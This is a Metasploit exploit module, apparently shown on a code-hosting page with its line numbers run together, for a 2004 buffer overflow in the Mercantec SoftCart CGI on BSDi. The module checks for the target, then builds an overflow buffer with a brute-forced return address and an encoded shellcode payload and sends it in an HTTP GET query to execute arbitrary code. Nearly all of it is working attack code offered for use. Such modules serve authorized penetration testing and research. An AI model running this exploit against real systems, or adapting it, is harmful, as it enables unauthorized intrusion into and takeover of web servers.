Path: blob/master/modules/exploits/bsdi/softcart/mercantec_softcart.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Brute9include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Mercantec SoftCart CGI Overflow',16'Description' => %q{17This is an exploit for an undisclosed buffer overflow18in the SoftCart.exe CGI as shipped with Mercantec's shopping19cart software. It is possible to execute arbitrary code20by passing a malformed CGI parameter in an HTTP GET21request. This issue is known to affect SoftCart version224.00b.23},24'Author' => [ 'skape', 'trew' ],25'References' => [26[ 'CVE', '2004-2221'],27[ 'OSVDB', '9011'],28[ 'BID', '10926'],29],30'Privileged' => false,31'Payload' => {32'Space' => 1000,33'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b\x7d\x28\x29\x3f\x5d\x5b\x00",34'MinNops' => 16,35'Prepend' => "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00\x00\x07\x00",36'PrependEncoder' => "\x83\xec\x7f"37},38'Platform' => 'bsdi',39'Targets' => [40[41'BSDi/4.3 Bruteforce',42{43'Bruteforce' =>44{45'Start' => { 'Ret' => 0xefbf3000 },46'Stop' => { 'Ret' => 0xefbffffc },47'Step' => 048}49},50],51],52'DisclosureDate' => '2004-08-19',53'DefaultTarget' => 0,54'Notes' => {55'Stability' => [CRASH_SERVICE_RESTARTS],56'Reliability' => [REPEATABLE_SESSION],57'SideEffects' => [IOC_IN_LOGS]58}59)60)6162register_options(63[64OptString.new('URI', [ false, 'The target CGI URI', '/cgi-bin/SoftCart.exe' ])65]66)67end6869def brute_exploit(address)70if !@mercantec71res = send_request_raw({72'uri' => normalize_uri(datastore['URI'])73}, 5)74@mercantec = res && res.body && res.body =~ /Copyright.*Mercantec/75fail_with(Failure::NotFound, 'The target is not a Mercantec CGI') if !@mercantec76end7778buffer =79'MAA+scstoreB' +80rand_text_alphanumeric(512) +81[address['Ret']].pack('V') +82'MSF!' +83[address['Ret'] + payload.encoded.length].pack('V') +84payload.encoded8586print_status("Trying #{'%.8x' % address['Ret']}...")87send_request_raw({88'uri' => normalize_uri(datastore['URI']),89'query' => buffer90}, 5)9192handler93end94end959697